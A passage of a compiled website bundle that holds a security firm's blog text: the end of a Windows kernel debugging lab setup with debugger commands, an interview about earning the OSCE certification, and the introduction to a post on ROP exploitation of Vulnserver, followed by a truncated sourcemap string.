101)\"},children:/*#__PURE__*/t(\"p\",{children:[\"Type \",/*#__PURE__*/e(\"code\",{children:\"lm m HEVD\"}),\" to check if the \",/*#__PURE__*/e(\"code\",{children:\"HEVD\"}),\" module is loaded.\"]})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",style:{\"--framer-font-size\":\"16px\",\"--framer-text-color\":\"rgb(83, 83, 101)\"},children:/*#__PURE__*/t(\"p\",{children:[\"And type \",/*#__PURE__*/e(\"code\",{children:\"x HEVD!*\"}),\" to check if the symbols were successfully added.\"]})})]}),/*#__PURE__*/e(\"img\",{alt:\"HEVD symbols gif\",className:\"framer-image\",height:\"287\",src:\"https://framerusercontent.com/images/GiggVRo6V4X0cfnTz62s9kRErI.gif\",srcSet:\"https://framerusercontent.com/images/GiggVRo6V4X0cfnTz62s9kRErI.gif?scale-down-to=512 512w,https://framerusercontent.com/images/GiggVRo6V4X0cfnTz62s9kRErI.gif?scale-down-to=1024 1024w,https://framerusercontent.com/images/GiggVRo6V4X0cfnTz62s9kRErI.gif 1228w\",style:{aspectRatio:\"1228 / 574\"},width:\"614\"}),/*#__PURE__*/e(\"p\",{children:\"With that, we can start debugging our target machine\u2019s kernel space!:\"}),/*#__PURE__*/e(\"img\",{alt:\"\",className:\"framer-image\",height:\"540\",src:\"https://framerusercontent.com/images/iwuvZ4ytXTtuMvHMor3P9oVU.png\",srcSet:\"https://framerusercontent.com/images/iwuvZ4ytXTtuMvHMor3P9oVU.png?scale-down-to=512 512w,https://framerusercontent.com/images/iwuvZ4ytXTtuMvHMor3P9oVU.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/iwuvZ4ytXTtuMvHMor3P9oVU.png 1920w\",style:{aspectRatio:\"1920 / 1080\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"In the \",/*#__PURE__*/e(r,{href:\"https://fluidattacks.com/blog/hevd-dos/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,preserveParams:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(o.a,{children:\"next post\"})}),\", you can see a short reference of \",/*#__PURE__*/e(\"code\",{children:\"WinDBG\"}),\" commands that we will be using during this process.\"]}),/*#__PURE__*/e(\"h2\",{children:\"Conclusions\"}),/*#__PURE__*/t(\"p\",{children:[\"This post will help you to setup a working Windows Kernel debugging lab. In the next posts we will be dealing with some theory on Windows Kernel and will start \",/*#__PURE__*/e(r,{href:\"https://fluidattacks.com/blog/hevd-dos/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,preserveParams:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(o.a,{children:\"exploiting HEVD\"})}),\".\"]})]});export const richText7=/*#__PURE__*/t(i.Fragment,{children:[/*#__PURE__*/e(\"img\",{alt:\"Roldan's certification\",className:\"framer-image\",height:\"540\",src:\"https://framerusercontent.com/images/MV7BT7McKTMD05tJW4mxV3EIvI.png\",srcSet:\"https://framerusercontent.com/images/MV7BT7McKTMD05tJW4mxV3EIvI.png?scale-down-to=512 512w,https://framerusercontent.com/images/MV7BT7McKTMD05tJW4mxV3EIvI.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/MV7BT7McKTMD05tJW4mxV3EIvI.png 1920w\",style:{aspectRatio:\"1920 / 1080\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"A few days ago, Fluid Attacks' Offensive Team Leader \",/*#__PURE__*/e(r,{href:\"https://fluidattacks.com/blog/authors/andres-roldan/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,preserveParams:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(o.a,{children:\"Andres Roldan\"})}),\", published a blog post about his '\",/*#__PURE__*/e(r,{href:\"https://fluidattacks.com/blog/osce-journey/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,preserveParams:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(o.a,{children:\"Journey to OSCE\"})}),\".' After reading it and showing more interest in his experience, we had some questions, which Andres was kind enough to answer. Here we share with you some of his insights:\"]}),/*#__PURE__*/e(\"p\",{children:/*#__PURE__*/e(\"strong\",{children:\"Why do you think you gravitated to the issues of hacking and cybersecurity initially?\"})}),/*#__PURE__*/e(\"p\",{children:\"I\u2019ve always been curious about how things work. In college, while studying Business Administration, some 20 years ago, I once read or heard the word 'Hacker' and started reading about what it meant to be a hacker and what skills were required. At that time, Windows 98 was in use, and terms like 'hacker,' 'cracker,' and 'phreaker' were popular. Besides, Kevin Mitnick was an idol, and the movies Matrix and Takedown were released. That atmosphere of deep knowledge was what led me to change careers and start on the path of cybersecurity.\"}),/*#__PURE__*/e(\"p\",{children:/*#__PURE__*/e(\"strong\",{children:\"Why did you read Aleph One\u2019s article about exploitation if you didn\u2019t know anything about computers?\"})}),/*#__PURE__*/e(\"p\",{children:\"If you searched in Altavista (the Google of 20 years ago) for terms related to 'hacking,' that was one of the results. That article was launched in Phrack magazine, which is still a reference point for security issues.\"}),/*#__PURE__*/e(\"p\",{children:/*#__PURE__*/e(\"strong\",{children:\"How and when did you discover Fluid Attacks? What were the requirements to fulfill at that time to become part of the company?\"})}),/*#__PURE__*/e(\"p\",{children:\"Before Fluid Attacks, I had a cybersecurity company, but it was not successful. Fluid Attacks was created by some friends in 2001. When they found out that my company was closed, they interviewed me and asked me about my knowledge. By that time (ending 2002), the experience I had acquired (in Linux, security, and hacking) by studying on my own was enough to get me into Fluid Attacks.\"}),/*#__PURE__*/e(\"p\",{children:/*#__PURE__*/e(\"strong\",{children:\"What kind of skills and knowledge do you think a person should possess to achieve this OSCE certification?\"})}),/*#__PURE__*/e(\"p\",{children:\"The CTP course is designed to help you think in a creative way when you are doing an intrusion. Knowledge is gained through study and discipline, but the key is the ability to think outside the box to resolve problems.\"}),/*#__PURE__*/e(\"p\",{children:/*#__PURE__*/e(\"strong\",{children:\"You told us that you did the CTP course modules several times. Why did you do that?\"})}),/*#__PURE__*/e(\"p\",{children:\"Because there are many variables to take into account when creating an exploit. You have to understand every step, every instruction, and why. Every application is different, and you can\u2019t apply 'by heart' attack patterns. You have to understand the reason for each step, and that is accomplished by repetition.\"}),/*#__PURE__*/e(\"p\",{children:/*#__PURE__*/e(\"strong\",{children:\"What is it that changes so much between the laboratory in the course and the exam?\"})}),/*#__PURE__*/e(\"p\",{children:\"The techniques to solve the exam are taught in the course. However, the exam exercises are not solved in the same way as the course exercises. It is necessary to understand the problem, understand the target\u2019s environment, and reuse what has been learned creatively.\"}),/*#__PURE__*/e(\"p\",{children:/*#__PURE__*/e(\"strong\",{children:\"How does the 'Hack The Box' machines' difficulty level compare to these lab and test exercises?\"})}),/*#__PURE__*/e(\"p\",{children:\"Hack The Box machines do a great job making you think out-of-the-box. These machines use different techniques, commonly employed on CTF challenges, but are uncommon in the real world. On the other hand, the CTP course has exercises to exploit real applications and real vulnerabilities using fuzzing and reverse engineering techniques and focused on finding 0-days.\"}),/*#__PURE__*/e(\"p\",{children:/*#__PURE__*/e(\"strong\",{children:\"Which were the most complex challenges in the exam?\"})}),/*#__PURE__*/e(\"p\",{children:\"Due to Offensive Security certification policies, students can\u2019t talk much about the exam details. However, all of the exam points are not straightforward. You have to really understand what\u2019s going on before attempting to create a solution for the challenge. Reading the objectives in detail for each exam point will give you a better understanding of how to approach the solution.\"}),/*#__PURE__*/e(\"p\",{children:/*#__PURE__*/e(\"strong\",{children:\"What would you recommend to those who want to obtain this certification?\"})}),/*#__PURE__*/t(\"p\",{children:[\"As I mentioned in \",/*#__PURE__*/e(r,{href:\"https://fluidattacks.com/blog/osce-journey/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,preserveParams:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(o.a,{children:\"the blog post\"})}),\", you should perform extra self-training after the CTP course. I, for instance, exploited several known vulnerabilities from scratch, using my methods and exploits. Furthermore, although it\u2019s not required to have the OSCP certification to obtain the OSCE, I strongly recommend it. Offensive Security certifications are meant to be hard, and having experience with other certifications before OSCE will be an advantage.\"]}),/*#__PURE__*/e(\"p\",{children:/*#__PURE__*/e(\"strong\",{children:\"Regarding certificates, what is the next goal you have in mind?\"})}),/*#__PURE__*/e(\"p\",{children:\"The current version of OSCE certification will disappear this year. It will be replaced by 2 different certifications that, along with OSWE, would be a new OSCE. However, those 2 new certifications are not ready yet. For now, I already have a spot for the Advanced Windows Exploitation course that will take place in London in April 2021. That is the course required before attempting to obtain the OSEE certification, which is regarded as the most difficult exploitation certification in the world.\"}),/*#__PURE__*/t(\"p\",{children:[\"Thanks to Andres for sharing about his achievement. \",/*#__PURE__*/e(r,{href:\"https://fluidattacks.com/blog/osce-journey/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,preserveParams:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(o.a,{children:\"Here\"})}),\" you can read the previous post about his experience with OSCE, and if you want to know more about the certifications that the members of our \",/*#__PURE__*/e(r,{href:\"https://fluidattacks.com/blog/red-team-exercise/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,preserveParams:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(o.a,{children:\"red team\"})}),\" have obtained, you can follow \",/*#__PURE__*/e(r,{href:\"https://fluidattacks.com/certifications/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,preserveParams:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(o.a,{children:\"this link\"})}),\".\"]})]});export const richText8=/*#__PURE__*/t(i.Fragment,{children:[/*#__PURE__*/t(\"p\",{children:[\"In the last blog posts, we\u2019ve been \",/*#__PURE__*/e(r,{href:\"https://fluidattacks.com/blog/understanding-dep/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,preserveParams:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(o.a,{children:\"dealing with DEP\"})}),\" (Data Execution Protection) and a way to \",/*#__PURE__*/e(r,{href:\"https://fluidattacks.com/blog/bypassing-dep/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,preserveParams:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(o.a,{children:\"bypass it with ROP\"})}),\" (Return-Oriented Programming). If you haven\u2019t read those articles, I strongly recommend it before diving into this one.\"]}),/*#__PURE__*/t(\"p\",{children:[\"In this article, we will use \",/*#__PURE__*/e(\"code\",{children:\"ROP\"}),\" to create a fully working exploit for the \",/*#__PURE__*/e(\"code\",{children:\"TRUN\"}),\" command of Vulnserver on a DEP-enabled Windows 10 OS.\"]})]});\nexport const __FramerMetadata__ = {\"exports\":{\"richText3\":{\"type\":\"variable\",\"annotations\":{\"framerContractVersion\":\"1\"}},\"richText8\":{\"type\":\"variable\",\"annotations\":{\"framerContractVersion\":\"1\"}},\"richText6\":{\"type\":\"variable\",\"annotations\":{\"framerContractVersion\":\"1\"}},\"richText1\":{\"type\":\"variable\",\"annotations\":{\"framerContractVersion\":\"1\"}},\"richText7\":{\"type\":\"variable\",\"annotations\":{\"framerContractVersion\":\"1\"}},\"richText\":{\"type\":\"variable\",\"annotations\":{\"framerContractVersion\":\"1\"}},\"richText4\":{\"type\":\"variable\",\"annotations\":{\"framerContractVersion\":\"1\"}},\"richText5\":{\"type\":\"variable\",\"annotations\":{\"framerContractVersion\":\"1\"}},\"richText2\":{\"type\":\"variable\",\"annotations\":{\"framerContractVersion\":\"1\"}},\"__FramerMetadata__\":{\"type\":\"variable\"}}}"],
  "mappings": "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